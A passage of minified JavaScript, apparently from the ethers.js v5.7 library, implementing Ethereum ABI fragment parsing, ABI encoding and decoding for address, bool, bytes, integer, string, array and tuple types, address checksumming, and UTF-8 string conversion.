                        let t = [], r = "", n = 0;
                        for(let i = 0; i < e.length; i++){
                            let o = e[i];
                            "," === o && 0 === n ? (t.push(r), r = "") : (r += o, "(" === o ? n++ : ")" === o && (n--, -1 === n && q.throwArgumentError("unbalanced parenthesis", "value", e)));
                        }
                        return r && t.push(r), t;
                    })(e).map((e)=>$.fromString(e, t));
                }
                class te {
                    constructor(e, t){
                        e !== z && q.throwError("use a static from method", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new Fragment()"
                        }), X(this, t), this._isFragment = !0, Object.freeze(this);
                    }
                    static from(e) {
                        return te.isFragment(e) ? e : "string" == typeof e ? te.fromString(e) : te.fromObject(e);
                    }
                    static fromObject(e) {
                        if (te.isFragment(e)) return e;
                        switch(e.type){
                            case "function":
                                return ae.fromObject(e);
                            case "event":
                                return re.fromObject(e);
                            case "constructor":
                                return se.fromObject(e);
                            case "error":
                                return ce.fromObject(e);
                            case "fallback":
                            case "receive":
                                return null;
                        }
                        return q.throwArgumentError("invalid fragment object", "value", e);
                    }
                    static fromString(e) {
                        return "event" === (e = (e = (e = e.replace(/\s/g, " ")).replace(/\(/g, " (").replace(/\)/g, ") ").replace(/\s+/g, " ")).trim()).split(" ")[0] ? re.fromString(e.substring(5).trim()) : "function" === e.split(" ")[0] ? ae.fromString(e.substring(8).trim()) : "constructor" === e.split("(")[0].trim() ? se.fromString(e.trim()) : "error" === e.split(" ")[0] ? ce.fromString(e.substring(5).trim()) : q.throwArgumentError("unsupported fragment", "value", e);
                    }
                    static isFragment(e) {
                        return !(!e || !e._isFragment);
                    }
                }
                class re extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "event",
                            anonymous: this.anonymous,
                            name: this.name,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "event "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", e !== Y.sighash && this.anonymous && (t += "anonymous "), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? re.fromString(e) : re.fromObject(e);
                    }
                    static fromObject(e) {
                        if (re.isEventFragment(e)) return e;
                        "event" !== e.type && q.throwArgumentError("invalid event object", "value", e);
                        const t = {
                            name: he(e.name),
                            anonymous: e.anonymous,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            type: "event"
                        };
                        return new re(z, t);
                    }
                    static fromString(e) {
                        let t = e.match(fe);
                        t || q.throwArgumentError("invalid event string", "value", e);
                        let r = !1;
                        return t[3].split(" ").forEach((e)=>{
                            switch(e.trim()){
                                case "anonymous":
                                    r = !0;
                                    break;
                                case "":
                                    break;
                                default:
                                    q.warn("unknown modifier: " + e);
                            }
                        }), re.fromObject({
                            name: t[1].trim(),
                            anonymous: r,
                            inputs: ee(t[2], !0),
                            type: "event"
                        });
                    }
                    static isEventFragment(e) {
                        return e && e._isFragment && "event" === e.type;
                    }
                }
                function ne(e, t) {
                    t.gas = null;
                    let r = e.split("@");
                    return 1 !== r.length ? (r.length > 2 && q.throwArgumentError("invalid human-readable ABI signature", "value", e), r[1].match(/^[0-9]+$/) || q.throwArgumentError("invalid human-readable ABI signature gas", "value", e), t.gas = M.from(r[1]), r[0]) : e;
                }
                function ie(e, t) {
                    t.constant = !1, t.payable = !1, t.stateMutability = "nonpayable", e.split(" ").forEach((e)=>{
                        switch(e.trim()){
                            case "constant":
                                t.constant = !0;
                                break;
                            case "payable":
                                t.payable = !0, t.stateMutability = "payable";
                                break;
                            case "nonpayable":
                                t.payable = !1, t.stateMutability = "nonpayable";
                                break;
                            case "pure":
                                t.constant = !0, t.stateMutability = "pure";
                                break;
                            case "view":
                                t.constant = !0, t.stateMutability = "view";
                                break;
                            case "external":
                            case "public":
                            case "":
                                break;
                            default:
                                console.log("unknown modifier: " + e);
                        }
                    });
                }
                function oe(e) {
                    let t = {
                        constant: !1,
                        payable: !0,
                        stateMutability: "payable"
                    };
                    return null != e.stateMutability ? (t.stateMutability = e.stateMutability, t.constant = "view" === t.stateMutability || "pure" === t.stateMutability, null != e.constant && !!e.constant !== t.constant && q.throwArgumentError("cannot have constant function with mutability " + t.stateMutability, "value", e), t.payable = "payable" === t.stateMutability, null != e.payable && !!e.payable !== t.payable && q.throwArgumentError("cannot have payable function with mutability " + t.stateMutability, "value", e)) : null != e.payable ? (t.payable = !!e.payable, null != e.constant || t.payable || "constructor" === e.type || q.throwArgumentError("unable to determine stateMutability", "value", e), t.constant = !!e.constant, t.constant ? t.stateMutability = "view" : t.stateMutability = t.payable ? "payable" : "nonpayable", t.payable && t.constant && q.throwArgumentError("cannot have constant payable function", "value", e)) : null != e.constant ? (t.constant = !!e.constant, t.payable = !t.constant, t.stateMutability = t.constant ? "view" : "payable") : "constructor" !== e.type && q.throwArgumentError("unable to determine stateMutability", "value", e), t;
                }
                class se extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "constructor",
                            stateMutability: "nonpayable" !== this.stateMutability ? this.stateMutability : void 0,
                            payable: this.payable,
                            gas: this.gas ? this.gas.toNumber() : void 0,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        e === Y.sighash && q.throwError("cannot format a constructor for sighash", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "format(sighash)"
                        });
                        let t = "constructor(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ";
                        return this.stateMutability && "nonpayable" !== this.stateMutability && (t += this.stateMutability + " "), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? se.fromString(e) : se.fromObject(e);
                    }
                    static fromObject(e) {
                        if (se.isConstructorFragment(e)) return e;
                        "constructor" !== e.type && q.throwArgumentError("invalid constructor object", "value", e);
                        let t = oe(e);
                        t.constant && q.throwArgumentError("constructor cannot be constant", "value", e);
                        const r = {
                            name: null,
                            type: e.type,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            payable: t.payable,
                            stateMutability: t.stateMutability,
                            gas: e.gas ? M.from(e.gas) : null
                        };
                        return new se(z, r);
                    }
                    static fromString(e) {
                        let t = {
                            type: "constructor"
                        }, r = (e = ne(e, t)).match(fe);
                        return r && "constructor" === r[1].trim() || q.throwArgumentError("invalid constructor string", "value", e), t.inputs = ee(r[2].trim(), !1), ie(r[3].trim(), t), se.fromObject(t);
                    }
                    static isConstructorFragment(e) {
                        return e && e._isFragment && "constructor" === e.type;
                    }
                }
                class ae extends se {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "function",
                            name: this.name,
                            constant: this.constant,
                            stateMutability: "nonpayable" !== this.stateMutability ? this.stateMutability : void 0,
                            payable: this.payable,
                            gas: this.gas ? this.gas.toNumber() : void 0,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e))),
                            outputs: this.outputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "function "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", e !== Y.sighash && (this.stateMutability ? "nonpayable" !== this.stateMutability && (t += this.stateMutability + " ") : this.constant && (t += "view "), this.outputs && this.outputs.length && (t += "returns (" + this.outputs.map((t)=>t.format(e)).join(", ") + ") "), null != this.gas && (t += "@" + this.gas.toString() + " ")), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? ae.fromString(e) : ae.fromObject(e);
                    }
                    static fromObject(e) {
                        if (ae.isFunctionFragment(e)) return e;
                        "function" !== e.type && q.throwArgumentError("invalid function object", "value", e);
                        let t = oe(e);
                        const r = {
                            type: e.type,
                            name: he(e.name),
                            constant: t.constant,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            outputs: e.outputs ? e.outputs.map($.fromObject) : [],
                            payable: t.payable,
                            stateMutability: t.stateMutability,
                            gas: e.gas ? M.from(e.gas) : null
                        };
                        return new ae(z, r);
                    }
                    static fromString(e) {
                        let t = {
                            type: "function"
                        }, r = (e = ne(e, t)).split(" returns ");
                        r.length > 2 && q.throwArgumentError("invalid function string", "value", e);
                        let n = r[0].match(fe);
                        if (n || q.throwArgumentError("invalid function signature", "value", e), t.name = n[1].trim(), t.name && he(t.name), t.inputs = ee(n[2], !1), ie(n[3].trim(), t), r.length > 1) {
                            let n = r[1].match(fe);
                            "" == n[1].trim() && "" == n[3].trim() || q.throwArgumentError("unexpected tokens", "value", e), t.outputs = ee(n[2], !1);
                        } else t.outputs = [];
                        return ae.fromObject(t);
                    }
                    static isFunctionFragment(e) {
                        return e && e._isFragment && "function" === e.type;
                    }
                }
                function ue(e) {
                    const t = e.format();
                    return "Error(string)" !== t && "Panic(uint256)" !== t || q.throwArgumentError(`cannot specify user defined ${t} error`, "fragment", e), e;
                }
                class ce extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "error",
                            name: this.name,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "error "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? ce.fromString(e) : ce.fromObject(e);
                    }
                    static fromObject(e) {
                        if (ce.isErrorFragment(e)) return e;
                        "error" !== e.type && q.throwArgumentError("invalid error object", "value", e);
                        const t = {
                            type: e.type,
                            name: he(e.name),
                            inputs: e.inputs ? e.inputs.map($.fromObject) : []
                        };
                        return ue(new ce(z, t));
                    }
                    static fromString(e) {
                        let t = {
                            type: "error"
                        }, r = e.match(fe);
                        return r || q.throwArgumentError("invalid error signature", "value", e), t.name = r[1].trim(), t.name && he(t.name), t.inputs = ee(r[2], !1), ue(ce.fromObject(t));
                    }
                    static isErrorFragment(e) {
                        return e && e._isFragment && "error" === e.type;
                    }
                }
                function le(e) {
                    return e.match(/^uint($|[^1-9])/) ? e = "uint256" + e.substring(4) : e.match(/^int($|[^1-9])/) && (e = "int256" + e.substring(3)), e;
                }
                const de = new RegExp("^[a-zA-Z$_][a-zA-Z0-9$_]*$");
                function he(e) {
                    return e && e.match(de) || q.throwArgumentError(`invalid identifier "${e}"`, "value", e), e;
                }
                const fe = new RegExp("^([^)(]*)\\((.*)\\)([^)(]*)$"), pe = new p(W);
                function me(e) {
                    const t = [], r = function(e, n) {
                        if (Array.isArray(n)) for(let i in n){
                            const o = e.slice();
                            o.push(i);
                            try {
                                r(o, n[i]);
                            } catch (e) {
                                t.push({
                                    path: o,
                                    error: e
                                });
                            }
                        }
                    };
                    return r([], e), t;
                }
                class ge {
                    constructor(e, t, r, n){
                        this.name = e, this.type = t, this.localName = r, this.dynamic = n;
                    }
                    _throwError(e, t) {
                        pe.throwArgumentError(e, this.localName, t);
                    }
                }
                class ye {
                    constructor(e){
                        F(this, "wordSize", e || 32), this._data = [], this._dataLength = 0, this._padding = new Uint8Array(e);
                    }
                    get data() {
                        return function(e) {
                            let t = "0x";
                            return e.forEach((e)=>{
                                t += T(e).substring(2);
                            }), t;
                        }(this._data);
                    }
                    get length() {
                        return this._dataLength;
                    }
                    _writeData(e) {
                        return this._data.push(e), this._dataLength += e.length, e.length;
                    }
                    appendWriter(e) {
                        return this._writeData(A(e._data));
                    }
                    writeBytes(e) {
                        let t = E(e);
                        const r = t.length % this.wordSize;
                        return r && (t = A([
                            t,
                            this._padding.slice(r)
                        ])), this._writeData(t);
                    }
                    _getValue(e) {
                        let t = E(M.from(e));
                        return t.length > this.wordSize && pe.throwError("value out-of-bounds", p.errors.BUFFER_OVERRUN, {
                            length: this.wordSize,
                            offset: t.length
                        }), t.length % this.wordSize && (t = A([
                            this._padding.slice(t.length % this.wordSize),
                            t
                        ])), t;
                    }
                    writeValue(e) {
                        return this._writeData(this._getValue(e));
                    }
                    writeUpdatableValue() {
                        const e = this._data.length;
                        return this._data.push(this._padding), this._dataLength += this.wordSize, (t)=>{
                            this._data[e] = this._getValue(t);
                        };
                    }
                }
                class ve {
                    constructor(e, t, r, n){
                        F(this, "_data", E(e)), F(this, "wordSize", t || 32), F(this, "_coerceFunc", r), F(this, "allowLoose", n), this._offset = 0;
                    }
                    get data() {
                        return T(this._data);
                    }
                    get consumed() {
                        return this._offset;
                    }
                    static coerce(e, t) {
                        let r = e.match("^u?int([0-9]+)$");
                        return r && parseInt(r[1]) <= 48 && (t = t.toNumber()), t;
                    }
                    coerce(e, t) {
                        return this._coerceFunc ? this._coerceFunc(e, t) : ve.coerce(e, t);
                    }
                    _peekBytes(e, t, r) {
                        let n = Math.ceil(t / this.wordSize) * this.wordSize;
                        return this._offset + n > this._data.length && (this.allowLoose && r && this._offset + t <= this._data.length ? n = t : pe.throwError("data out-of-bounds", p.errors.BUFFER_OVERRUN, {
                            length: this._data.length,
                            offset: this._offset + n
                        })), this._data.slice(this._offset, this._offset + n);
                    }
                    subReader(e) {
                        return new ve(this._data.slice(this._offset + e), this.wordSize, this._coerceFunc, this.allowLoose);
                    }
                    readBytes(e, t) {
                        let r = this._peekBytes(0, e, !!t);
                        return this._offset += r.length, r.slice(0, e);
                    }
                    readValue() {
                        return M.from(this.readBytes(this.wordSize));
                    }
                }
                var be = r(3669), Ee = r.n(be);
                function Ae(e) {
                    return "0x" + Ee().keccak_256(E(e));
                }
                const _e = new p("address/5.7.0");
                function we(e) {
                    _(e, 20) || _e.throwArgumentError("invalid address", "address", e);
                    const t = (e = e.toLowerCase()).substring(2).split(""), r = new Uint8Array(40);
                    for(let e = 0; e < 40; e++)r[e] = t[e].charCodeAt(0);
                    const n = E(Ae(r));
                    for(let e = 0; e < 40; e += 2)n[e >> 1] >> 4 >= 8 && (t[e] = t[e].toUpperCase()), (15 & n[e >> 1]) >= 8 && (t[e + 1] = t[e + 1].toUpperCase());
                    return "0x" + t.join("");
                }
                const Te = {};
                for(let e = 0; e < 10; e++)Te[String(e)] = String(e);
                for(let e = 0; e < 26; e++)Te[String.fromCharCode(65 + e)] = String(10 + e);
                const Re = Math.floor((Ie = 9007199254740991, Math.log10 ? Math.log10(Ie) : Math.log(Ie) / Math.LN10));
                var Ie;
                function Se(e) {
                    let t = null;
                    if ("string" != typeof e && _e.throwArgumentError("invalid address", "address", e), e.match(/^(0x)?[0-9a-fA-F]{40}$/)) "0x" !== e.substring(0, 2) && (e = "0x" + e), t = we(e), e.match(/([A-F].*[a-f])|([a-f].*[A-F])/) && t !== e && _e.throwArgumentError("bad address checksum", "address", e);
                    else if (e.match(/^XE[0-9]{2}[0-9A-Za-z]{30,31}$/)) {
                        for(e.substring(2, 4) !== function(e) {
                            let t = (e = (e = e.toUpperCase()).substring(4) + e.substring(0, 2) + "00").split("").map((e)=>Te[e]).join("");
                            for(; t.length >= Re;){
                                let e = t.substring(0, Re);
                                t = parseInt(e, 10) % 97 + t.substring(e.length);
                            }
                            let r = String(98 - parseInt(t, 10) % 97);
                            for(; r.length < 2;)r = "0" + r;
                            return r;
                        }(e) && _e.throwArgumentError("bad icap checksum", "address", e), r = e.substring(4), t = new I(r, 36).toString(16); t.length < 40;)t = "0" + t;
                        t = we("0x" + t);
                    } else _e.throwArgumentError("invalid address", "address", e);
                    var r;
                    return t;
                }
                class Pe extends ge {
                    constructor(e){
                        super("address", "address", e, !1);
                    }
                    defaultValue() {
                        return "0x0000000000000000000000000000000000000000";
                    }
                    encode(e, t) {
                        try {
                            t = Se(t);
                        } catch (e) {
                            this._throwError(e.message, t);
                        }
                        return e.writeValue(t);
                    }
                    decode(e) {
                        return Se(R(e.readValue().toHexString(), 20));
                    }
                }
                class Oe extends ge {
                    constructor(e){
                        super(e.name, e.type, void 0, e.dynamic), this.coder = e;
                    }
                    defaultValue() {
                        return this.coder.defaultValue();
                    }
                    encode(e, t) {
                        return this.coder.encode(e, t);
                    }
                    decode(e) {
                        return this.coder.decode(e);
                    }
                }
                const xe = new p(W);
                function Me(e, t, r) {
                    let n = null;
                    if (Array.isArray(r)) n = r;
                    else if (r && "object" == typeof r) {
                        let e = {};
                        n = t.map((t)=>{
                            const n = t.localName;
                            return n || xe.throwError("cannot encode object for signature with missing names", p.errors.INVALID_ARGUMENT, {
                                argument: "values",
                                coder: t,
                                value: r
                            }), e[n] && xe.throwError("cannot encode object for signature with duplicate names", p.errors.INVALID_ARGUMENT, {
                                argument: "values",
                                coder: t,
                                value: r
                            }), e[n] = !0, r[n];
                        });
                    } else xe.throwArgumentError("invalid tuple value", "tuple", r);
                    t.length !== n.length && xe.throwArgumentError("types/value length mismatch", "tuple", r);
                    let i = new ye(e.wordSize), o = new ye(e.wordSize), s = [];
                    t.forEach((e, t)=>{
                        let r = n[t];
                        if (e.dynamic) {
                            let t = o.length;
                            e.encode(o, r);
                            let n = i.writeUpdatableValue();
                            s.push((e)=>{
                                n(e + t);
                            });
                        } else e.encode(i, r);
                    }), s.forEach((e)=>{
                        e(i.length);
                    });
                    let a = e.appendWriter(i);
                    return a += e.appendWriter(o), a;
                }
                function Be(e, t) {
                    let r = [], n = e.subReader(0);
                    t.forEach((t)=>{
                        let i = null;
                        if (t.dynamic) {
                            let r = e.readValue(), o = n.subReader(r.toNumber());
                            try {
                                i = t.decode(o);
                            } catch (e) {
                                if (e.code === p.errors.BUFFER_OVERRUN) throw e;
                                i = e, i.baseType = t.name, i.name = t.localName, i.type = t.type;
                            }
                        } else try {
                            i = t.decode(e);
                        } catch (e) {
                            if (e.code === p.errors.BUFFER_OVERRUN) throw e;
                            i = e, i.baseType = t.name, i.name = t.localName, i.type = t.type;
                        }
                        null != i && r.push(i);
                    });
                    const i = t.reduce((e, t)=>{
                        const r = t.localName;
                        return r && (e[r] || (e[r] = 0), e[r]++), e;
                    }, {});
                    t.forEach((e, t)=>{
                        let n = e.localName;
                        if (!n || 1 !== i[n]) return;
                        if ("length" === n && (n = "_length"), null != r[n]) return;
                        const o = r[t];
                        o instanceof Error ? Object.defineProperty(r, n, {
                            enumerable: !0,
                            get: ()=>{
                                throw o;
                            }
                        }) : r[n] = o;
                    });
                    for(let e = 0; e < r.length; e++){
                        const t = r[e];
                        t instanceof Error && Object.defineProperty(r, e, {
                            enumerable: !0,
                            get: ()=>{
                                throw t;
                            }
                        });
                    }
                    return Object.freeze(r);
                }
                class Ne extends ge {
                    constructor(e, t, r){
                        super("array", e.type + "[" + (t >= 0 ? t : "") + "]", r, -1 === t || e.dynamic), this.coder = e, this.length = t;
                    }
                    defaultValue() {
                        const e = this.coder.defaultValue(), t = [];
                        for(let r = 0; r < this.length; r++)t.push(e);
                        return t;
                    }
                    encode(e, t) {
                        Array.isArray(t) || this._throwError("expected array value", t);
                        let r = this.length;
                        -1 === r && (r = t.length, e.writeValue(t.length)), xe.checkArgumentCount(t.length, r, "coder array" + (this.localName ? " " + this.localName : ""));
                        let n = [];
                        for(let e = 0; e < t.length; e++)n.push(this.coder);
                        return Me(e, n, t);
                    }
                    decode(e) {
                        let t = this.length;
                        -1 === t && (t = e.readValue().toNumber(), 32 * t > e._data.length && xe.throwError("insufficient data length", p.errors.BUFFER_OVERRUN, {
                            length: e._data.length,
                            count: t
                        }));
                        let r = [];
                        for(let e = 0; e < t; e++)r.push(new Oe(this.coder));
                        return e.coerce(this.name, Be(e, r));
                    }
                }
                class Ce extends ge {
                    constructor(e){
                        super("bool", "bool", e, !1);
                    }
                    defaultValue() {
                        return !1;
                    }
                    encode(e, t) {
                        return e.writeValue(t ? 1 : 0);
                    }
                    decode(e) {
                        return e.coerce(this.type, !e.readValue().isZero());
                    }
                }
                class ke extends ge {
                    constructor(e, t){
                        super(e, e, t, !0);
                    }
                    defaultValue() {
                        return "0x";
                    }
                    encode(e, t) {
                        t = E(t);
                        let r = e.writeValue(t.length);
                        return r += e.writeBytes(t), r;
                    }
                    decode(e) {
                        return e.readBytes(e.readValue().toNumber(), !0);
                    }
                }
                class Le extends ke {
                    constructor(e){
                        super("bytes", e);
                    }
                    decode(e) {
                        return e.coerce(this.name, T(super.decode(e)));
                    }
                }
                class Fe extends ge {
                    constructor(e, t){
                        let r = "bytes" + String(e);
                        super(r, r, t, !1), this.size = e;
                    }
                    defaultValue() {
                        return "0x0000000000000000000000000000000000000000000000000000000000000000".substring(0, 2 + 2 * this.size);
                    }
                    encode(e, t) {
                        let r = E(t);
                        return r.length !== this.size && this._throwError("incorrect data length", t), e.writeBytes(r);
                    }
                    decode(e) {
                        return e.coerce(this.name, T(e.readBytes(this.size)));
                    }
                }
                class De extends ge {
                    constructor(e){
                        super("null", "", e, !1);
                    }
                    defaultValue() {
                        return null;
                    }
                    encode(e, t) {
                        return null != t && this._throwError("not null", t), e.writeBytes([]);
                    }
                    decode(e) {
                        return e.readBytes(0), e.coerce(this.name, null);
                    }
                }
                const je = M.from(-1), Ue = M.from(0), He = M.from(1), Ge = M.from("0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff");
                class Ve extends ge {
                    constructor(e, t, r){
                        const n = (t ? "int" : "uint") + 8 * e;
                        super(n, n, r, !1), this.size = e, this.signed = t;
                    }
                    defaultValue() {
                        return 0;
                    }
                    encode(e, t) {
                        let r = M.from(t), n = Ge.mask(8 * e.wordSize);
                        if (this.signed) {
                            let e = n.mask(8 * this.size - 1);
                            (r.gt(e) || r.lt(e.add(He).mul(je))) && this._throwError("value out-of-bounds", t);
                        } else (r.lt(Ue) || r.gt(n.mask(8 * this.size))) && this._throwError("value out-of-bounds", t);
                        return r = r.toTwos(8 * this.size).mask(8 * this.size), this.signed && (r = r.fromTwos(8 * this.size).toTwos(8 * e.wordSize)), e.writeValue(r);
                    }
                    decode(e) {
                        let t = e.readValue().mask(8 * this.size);
                        return this.signed && (t = t.fromTwos(8 * this.size)), e.coerce(this.name, t);
                    }
                }
                const We = new p("strings/5.7.0");
                var qe, ze;
                function Qe(e, t, r, n, i) {
                    if (e === ze.BAD_PREFIX || e === ze.UNEXPECTED_CONTINUE) {
                        let e = 0;
                        for(let n = t + 1; n < r.length && r[n] >> 6 == 2; n++)e++;
                        return e;
                    }
                    return e === ze.OVERRUN ? r.length - t - 1 : 0;
                }
                !function(e) {
                    e.current = "", e.NFC = "NFC", e.NFD = "NFD", e.NFKC = "NFKC", e.NFKD = "NFKD";
                }(qe || (qe = {})), function(e) {
                    e.UNEXPECTED_CONTINUE = "unexpected continuation byte", e.BAD_PREFIX = "bad codepoint prefix", e.OVERRUN = "string overrun", e.MISSING_CONTINUE = "missing continuation byte", e.OUT_OF_RANGE = "out of UTF-8 range", e.UTF16_SURROGATE = "UTF-16 surrogate", e.OVERLONG = "overlong representation";
                }(ze || (ze = {}));
                const Ke = Object.freeze({
                    error: function(e, t, r, n, i) {
                        return We.throwArgumentError(`invalid codepoint at offset ${t}; ${e}`, "bytes", r);
                    },
                    ignore: Qe,
                    replace: function(e, t, r, n, i) {
                        return e === ze.OVERLONG ? (n.push(i), 0) : (n.push(65533), Qe(e, t, r));
                    }
                });
                function Je(e, t = qe.current) {
                    t != qe.current && (We.checkNormalize(), e = e.normalize(t));
                    let r = [];
                    for(let t = 0; t < e.length; t++){
                        const n = e.charCodeAt(t);
                        if (n < 128) r.push(n);
                        else if (n < 2048) r.push(n >> 6 | 192), r.push(63 & n | 128);
                        else if (55296 == (64512 & n)) {
                            t++;
                            const i = e.charCodeAt(t);
                            if (t >= e.length || 56320 != (64512 & i)) throw new Error("invalid utf-8 string");
                            const o = 65536 + ((1023 & n) << 10) + (1023 & i);
                            r.push(o >> 18 | 240), r.push(o >> 12 & 63 | 128), r.push(o >> 6 & 63 | 128), r.push(63 & o | 128);
                        } else r.push(n >> 12 | 224), r.push(n >> 6 & 63 | 128), r.push(63 & n | 128);
                    }
                    return E(r);
                }
                function Xe(e, t) {
                    return (function(e, t) {
                        null == t && (t = Ke.error), e = E(e);
                        const r = [];
                        let n = 0;
                        for(; n < e.length;){
                            const i = e[n++];
                            if (i >> 7 == 0) {
                                r.push(i);
                                continue;
                            }
                            let o = null, s = null;
                            if (192 == (224 & i)) o = 1, s = 127;
                            else if (224 == (240 & i)) o = 2, s = 2047;
                            else {
                                if (240 != (248 & i)) {
                                    n += t(128 == (192 & i) ? ze.UNEXPECTED_CONTINUE : ze.BAD_PREFIX, n - 1, e, r);
                                    continue;
                                }
                                o = 3, s = 65535;
                            }
                            if (n - 1 + o >= e.length) {
                                n += t(ze.OVERRUN, n - 1, e, r);
                                continue;
                            }
                            let a = i & (1 << 8 - o - 1) - 1;
                            for(let i = 0; i < o; i++){
                                let i = e[n];
                                if (128 != (192 & i)) {
                                    n += t(ze.MISSING_CONTINUE, n, e, r), a = null;
                                    break;
                                }
                                a = a << 6 | 63 & i, n++;
                            }
                            null !== a && (a > 1114111 ? n += t(ze.OUT_OF_RANGE, n - 1 - o, e, r, a) : a >= 55296 && a <= 57343 ? n += t(ze.UTF16_SURROGATE, n - 1 - o, e, r, a) : a <= s ? n += t(ze.OVERLONG, n - 1 - o, e, r, a) : r.push(a));
                        }
                        return r;
                    })(e, t).map((e)=>e <= 65535 ? String.fromCharCode(e) : (e -= 65536, String.fromCharCode(55296 + (e >> 10 & 1023), 56320 + (1023 & e)))).join("");
                }
                class Ye extends ke {
                    constructor(e){
                        super("string", e);
                    }
                    defaultValue() {
                        return "";
                    }
                    encode(e, t) {
                        return super.encode(e, Je(t));
                    }
                    decode(e) {
                        return Xe(super.decode(e));
                    }
                }
                class Ze extends ge {
                    constructor(e, t){
                        let r = !1;
                        const n = [];
                        e.forEach((e)=>{
                            e.dynamic && (r = !0), n.push(e.type);
                        }), super("tuple", "tuple(" + n.join(",") + ")", t, r), this.coders = e;
                    }
                    defaultValue() {
                        const e = [];
                        this.coders.forEach((t)=>{
                            e.push(t.defaultValue());
                        });
                        const t = this.coders.reduce((e, t)=>{
                            const r = t.localName;
                            return r && (e[r] || (e[r] = 0), e[r]++), e;
                        }, {});
                        return this.coders.forEach((r, n)=>{
                            let i = r.localName;
                            i && 1 === t[i] && ("length" === i && (i = "_length"), null == e[i] && (e[i] = e[n]));
                        }), Object.freeze(e);
                    }
                    encode(e, t) {
                        return Me(e, this.coders, t);
                    }
                    decode(e) {
                        return e.coerce(this.name, Be(e, this.coders));
                    }
                }
                const $e = new p(W), et = new RegExp(/^bytes([0-9]*)$/), tt = new RegExp(/^(u?int)([0-9]*)$/);
                class rt {
                    constructor(e){
                        F(this, "coerceFunc", e || null);
                    }
                    _getCoder(e) {
                        switch(e.baseType){
                            case "address":
                                return new Pe(e.name);
                            case "bool":
                                return new Ce(e.name);
                            case "string":
                                return new Ye(e.name);
                            case "bytes":
                                return new Le(e.name);
                            case "array":
                                return new Ne(this._getCoder(e.arrayChildren), e.arrayLength, e.name);
                            case "tuple":
                                return new Ze((e.components || []).map((e)=>this._getCoder(e)), e.name);
                            case "":
                                return new De(e.name);
                        }
                        let t = e.type.match(tt);
                        if (t) {
                            let r = parseInt(t[2] || "256");
                            return (0 === r || r > 256 || r % 8 != 0) && $e.throwArgumentError("invalid " + t[1] + " bit length", "param", e), new Ve(r / 8, "int" === t[1], e.name);
                        }
                        if (t = e.type.match(et), t) {
                            let r = parseInt(t[1]);
                            return (0 === r || r > 32) && $e.throwArgumentError("invalid bytes length", "param", e), new Fe(r, e.name);
                        }
                        return $e.throwArgumentError("invalid type", "type", e.type);
                    }
                    _getWordSize() {
                        return 32;
                    }
                    _getReader(e, t) {
                        return new ve(e, this._getWordSize(), this.coerceFunc, t);
                    }
                    _getWriter() {
                        return new ye(this._getWordSize());
                    }
                    getDefaultValue(e) {
                        const t = e.map((e)=>this._getCoder($.from(e)));
                        return new Ze(t, "_").defaultValue();
                    }
                    encode(e, t) {
                        e.length !== t.length && $e.throwError("types/values length mismatch", p.errors.INVALID_ARGUMENT, {
                            count: {
                                types: e.length,
                                values: t.length
                            },
                            value: {
                                types: e,
                                values: t
                            }
                        });
                        const r = e.map((e)=>this._getCoder($.from(e))), n = new Ze(r, "_"), i = this._getWriter();
                        return n.encode(i, t), i.data;
                    }
                    decode(e, t, r) {
                        const n = e.map((e)=>this._getCoder($.from(e)));
                        return new Ze(n, "_").decode(this._getReader(E(t), r));
                    }
                }
                const nt = new rt;
                function it(e) {
                    return Ae(Je(e));
                }
                const ot = new p(W);
                class st extends V {
                }
                class at extends V {
                }
                class ut extends V {
                }
                class ct extends V {
                    static isIndexed(e) {
                        return !(!e || !e._isIndexed);
                    }
                }
                const lt = {
                    "0x08c379a0": {
                        signature: "Error(string)",
                        name: "Error",
                        inputs: [
                            "string"
                        ],
                        reason: !0
                    },
                    "0x4e487b71": {
                        signature: "Panic(uint256)",
                        name: "Panic",
                        inputs: [
                            "uint256"
                        ]
                    }
                };
                function dt(e, t) {
                    const r = new Error(`deferred error during ABI decoding triggered accessing ${e}`);
                    return r.error = t, r;
                }
                class ht {
                    constructor(e){
                        let t = [];
                        t = "string" == typeof e ? JSON.parse(e) : e, F(this, "fragments", t.map((e)=>te.from(e)).filter((e)=>null != e)), F(this, "_abiCoder", D(new.target, "getAbiCoder")()), F(this, "functions", {}), F(this, "errors", {}), F(this, "events", {}), F(this, "structs", {}), this.fragments.forEach((e)=>{
                            let t = null;
                            switch(e.type){
                                case "constructor":
                                    return this.deploy ? void ot.warn("duplicate definition - constructor") : void F(this, "deploy", e);
                                case "function":
                                    t = this.functions;
                                    break;
                                case "event":
                                    t = this.events;
                                    break;
                                case "error":
                                    t = this.errors;
                                    break;
                                default:
                                    return;
                            }
                            let r = e.format();
